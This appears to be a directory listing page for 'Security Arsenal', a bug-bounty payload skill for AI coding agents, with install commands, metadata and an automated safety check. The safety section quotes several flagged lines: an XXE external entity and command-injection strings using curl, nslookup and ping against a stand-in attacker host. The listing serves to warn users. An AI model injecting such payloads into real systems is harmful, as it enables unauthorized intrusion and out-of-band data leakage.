Agent skill

Security Arsenal

by Gabson0x in Gabson0x/bountyforge

Security payloads, bypass tables, wordlists, gf pattern names, always-rejected bug list, conditionally-valid-with-chain table, temp email creation scripts, XXE/deserialization/host header injection…

No licenceAuto-check: warningsSecurity

Install Security Arsenal

The automated check flagged lines worth reading first. See the safety section below.

skills CLI
$ npx skills add Gabson0x/bountyforge --skill security-arsenal -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install Gabson0x/bountyforge security-arsenal --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/Gabson0x/bountyforge.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/security-arsenal .claude/skills/security-arsenal && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
security-arsenal
GitHub stars
442
Token cost
~8.5k tokens
SKILL.md length
591 words
Files
1
Skills in repo
6
Repo updated
First seen
Licence
None found

At a glance

Security payloads, bypass tables, wordlists, gf pattern names, always-rejected bug list, conditionally-valid-with-chain table, temp email creation scripts, XXE/deserialization/host header injection…

  • You need specific payloads for XSS/SSRF/SQLi/XXE/NoSQLi/command injection/SSTI/IDOR/path-traversal/HTTP smuggling/WebSocket/MFA bypass
  • SKILL.md covers TEMP EMAIL SETUP (For…, XSS PAYLOADS, SSRF PAYLOADS and SQL INJECTION PAYLOADS, plus 2 more sections
  • Calls java, curl and jq; reaches api.mail.tm and yopmail.com
  • Bypass techniques

What it does

Security Arsenal is an agent skill from Gabson0x/bountyforge. Security payloads, bypass tables, wordlists, gf pattern names, always-rejected bug list, conditionally-valid-with-chain table, temp email creation scripts, XXE/deserialization/host header injection payloads. Use when you need specific payloads for XSS/SSRF/SQLi/XXE/NoSQLi/command injection/SSTI/IDOR/path-traversal/HTTP smuggling/WebSocket/MFA bypass, bypass techniques, temp email setup for multi-account testing, or to check if a finding is submittable. Also use when asked about what NOT to submit.

Its SKILL.md is about 8.5k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.

It sits in Security, covering Web application vulnerabilities. It works with Microsoft Word. The repository describes itself as: all round pentest skill.

When your agent uses it

  • You need specific payloads for XSS/SSRF/SQLi/XXE/NoSQLi/command injection/SSTI/IDOR/path-traversal/HTTP smuggling/WebSocket/MFA bypass
  • Bypass techniques
  • Temp email setup for multi-account testing
  • Check if a finding is submittable

Example prompts

  • “/security-arsenal”

Requirements

  • Python 3
  • Docker

What it can do on your machine

Read from SKILL.md and the folder at commit 068399d. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Shell commands in SKILL.md call:

    • java
    • curl
    • jq
    • wget

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    Hosts in commands or code, which the agent is likely to contact:

    • api.mail.tm
    • yopmail.com
    • guerrillamail.com
    • api.guerrillamail.com
    • allowed-domain.com
    • w3.org
    • github.com

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Security Arsenal loads about 8.5k tokens when it runs. Until then it costs about 130 tokens; SKILL.md has 591 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~130
When it runs · the whole SKILL.md, loaded when a task matches
~8.5k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check: warnings

The automated check found patterns that need a careful read before installing.

  • WarningMentions a paste, webhook or tunnelling service often used to send data outSKILL.md:236
    o [<!ENTITY xxe SYSTEM "http://attacker.burpcollaborator.net/xxe">]>
  • WarningMentions a paste, webhook or tunnelling service often used to send data outSKILL.md:622
    ; curl https://attacker.burpcollaborator.net
  • WarningMentions a paste, webhook or tunnelling service often used to send data outSKILL.md:623
    ; nslookup attacker.burpcollaborator.net
  • WarningMentions a paste, webhook or tunnelling service often used to send data outSKILL.md:624
    $(nslookup attacker.burpcollaborator.net)
  • WarningMentions a paste, webhook or tunnelling service often used to send data outSKILL.md:625
    `ping -c 1 attacker.burpcollaborator.net`
  • NoteMentions a .env fileSKILL.md:1233
    sensitive.txt      # Sensitive paths (.env, config.json, backup, etc.)
  • NoteMentions a .env fileSKILL.md:1240
    /.env

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

Without a licence we can't republish the file, so here is its outline and opening line. It has 591 words (~8,456 tokens).

“Payloads, bypass tables, wordlists, temp email setup, and submission rules.”

— opening of SKILL.md by Gabson0x
name
security-arsenal

Read the full SKILL.md on GitHub

Files

Just SKILL.md in skills/security-arsenal of Gabson0x/bountyforge.

Open the folder on GitHubat commit 068399d

Compare with similar skills

Security Arsenal next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Security Arsenal compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Security Arsenal this skillGabson0x/bountyforge442—~8.5kAutomated safety check: WarnNone
Cti Risk Reduction ReportTracecatHQ/tracecat3.8k—~6.9kAutomated safety check: PassMIT
Security Arsenalsickn33/agentic-awesome-skills47k1 repos~3.2kAutomated safety check: WarnMIT
Offensive ReportingSnailSploit/Claude-Red7.4k—~3.7kAutomated safety check: PassMIT
Hunt InjectionEncod3d-Sec/TORCH329—~2kAutomated safety check: PassMIT
Xxe TestingNeoTheCapt/RedteamAgent143—~1kAutomated safety check: PassNone

Similar skills

  • Cti Risk Reduction Report

    TracecatHQ/tracecat

    Rates a threat against the OWASP Risk Rating Methodology, then rates it again counting only the mitigations that are implemented and verified, and again counting dated commitments, and shows the…

    3.8k GitHub stars~6.9k tokensUpdated today
    SecurityAuto-check passed
  • Security Arsenal

    sickn33/agentic-awesome-skills

    Security payloads, bypass tables, wordlists, gf pattern names, always-rejected bug list, and conditionally-valid-with-chain table.

    47k GitHub starsUsed in 1 repo~3.2k tokens
    SecurityAuto-check: warnings
  • Offensive Reporting

    SnailSploit/Claude-Red

    Penetration test and red team report writing methodology. An agent skill from SnailSploit/Claude-Red.

    7.4k GitHub stars~3.7k tokensUpdated 20 days ago
    SecurityAuto-check passed
  • Hunt Injection

    Encod3d-Sec/TORCH

    GraphQL IDOR/auth-bypass, XXE file-read/SSRF (SVG/DOCX/SAML), SSTI detection and RCE.

    329 GitHub stars~2k tokensUpdated 1 mo ago
    SecurityAuto-check passed
  • Xxe Testing

    NeoTheCapt/RedteamAgent

    XML external entity injection for file read, SSRF, and DoS. An agent skill from NeoTheCapt/RedteamAgent.

    143 GitHub stars~1k tokensUpdated 2 mo ago
    SecurityAuto-check passed
  • Security Arsenal

    elementalsouls/Claude-BugHunter

    Security payloads, bypass tables, wordlists, gf pattern names, always-rejected bug list, and conditionally-valid-with-chain table.

    4.8k GitHub stars~7.2k tokensUpdated today
    SecurityAuto-check: warnings

More from Gabson0x/bountyforge

  • Solidity Auditor

    Gabson0x/bountyforge

    Security audit of Solidity code while you develop. An agent skill from Gabson0x/bountyforge.

    442 GitHub stars~3.7k tokensUpdated 23 days ago
    Auto-check passed
  • Hackenproof Triage Marketplace

    Gabson0x/bountyforge

    HackenProof bug bounty triage workflow for Claude Code plugin marketplace operations.

    442 GitHub stars~1.2k tokensUpdated 23 days ago
    Auto-check passed
  • Web2 Recon

    Gabson0x/bountyforge

    Web2 recon pipeline — subdomain enum, URL crawling, JS analysis, temp emails, directory fuzzing.

    442 GitHub stars~1.6k tokensUpdated 23 days ago
    Auto-check passed
  • Web2 Vuln Classes

    Gabson0x/bountyforge

    Complete reference for 28 web2 bug classes with root causes, detection patterns, bypass tables, exploit techniques, and real paid examples.

    442 GitHub stars~11k tokensUpdated 23 days ago
    Auto-check: warnings
  • Code Sleuth

    Gabson0x/bountyforge

    Analyze EVM smart contracts for storage-safety vulnerabilities that can cause persistent state updates to be lost, overwritten, misdirected, or to collide across proxy or upgrade boundaries.

    442 GitHub stars~1.5k tokensUpdated 23 days ago
    Auto-check passed

Works with

Categories

Questions about Security Arsenal

What does Security Arsenal do?

Security payloads, bypass tables, wordlists, gf pattern names, always-rejected bug list, conditionally-valid-with-chain table, temp email creation scripts, XXE/deserialization/host header injection…. Security Arsenal is an agent skill from Gabson0x/bountyforge. Security payloads, bypass tables, wordlists, gf pattern names, always-rejected bug list, conditionally-valid-with-chain table, temp email creation scripts, XXE/deserialization/host header injection payloads.

When should I use Security Arsenal?

Security Arsenal fits situations like: you need specific payloads for XSS/SSRF/SQLi/XXE/NoSQLi/command injection/SSTI/IDOR/path-traversal/HTTP smuggling/WebSocket/MFA bypass; bypass techniques; temp email setup for multi-account testing; check if a finding is submittable.

How do I install Security Arsenal in Claude Code?

Run `npx skills add Gabson0x/bountyforge --skill security-arsenal -a claude-code`. Or copy the skill folder (skills/security-arsenal in Gabson0x/bountyforge) into .claude/skills/security-arsenal in your project. Claude Code loads it when a task matches its description.

How do I install Security Arsenal in Codex?

Run `npx skills add Gabson0x/bountyforge --skill security-arsenal -a codex`. Or copy the skill folder (skills/security-arsenal in Gabson0x/bountyforge) into .agents/skills/security-arsenal in your project. Codex loads it when a task matches its description.

Can I use Security Arsenal in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add Gabson0x/bountyforge --skill security-arsenal -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/security-arsenal, .gemini/skills/security-arsenal, .github/skills/security-arsenal and .opencode/skills/security-arsenal in your project.

What does Security Arsenal need to run?

Going by SKILL.md and its folder, Security Arsenal needs the command-line tools its instructions call (java, curl, jq and wget). Our summary lists: Python 3; Docker.

Does Security Arsenal access the network?

SKILL.md names 7 domains. In commands or code: api.mail.tm, yopmail.com, guerrillamail.com, api.guerrillamail.com, allowed-domain.com, w3.org and github.com; the agent is likely to contact these when it follows the instructions. This is read from the text; nothing was executed.

Is Security Arsenal safe to install?

Our automated static check of SKILL.md flagged 5 warning(s): mentions a paste, webhook or tunnelling service often used to send data out. Read the flagged lines before installing; the check is not a guarantee either way.

What licence does Security Arsenal use?

No licence was found for Security Arsenal or its repository. Without one, default copyright applies: ask the author before reusing or redistributing it.

How many tokens does Security Arsenal use?

About 8.5k tokens (SKILL.md is roughly 34k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to Security Arsenal?

Skills that share tags, products or a category with Security Arsenal: Cti Risk Reduction Report (TracecatHQ/tracecat, 3.8k stars), Security Arsenal (sickn33/agentic-awesome-skills, 47k stars), Offensive Reporting (SnailSploit/Claude-Red, 7.4k stars) and Hunt Injection (Encod3d-Sec/TORCH, 329 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Security Arsenal?

Gabson0x (a GitHub user) maintains it in Gabson0x/bountyforge, which has 442 GitHub stars. The repository holds 6 skills in this directory. The repository was last updated on September 16, 2026.

Source: Gabson0x/bountyforge on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.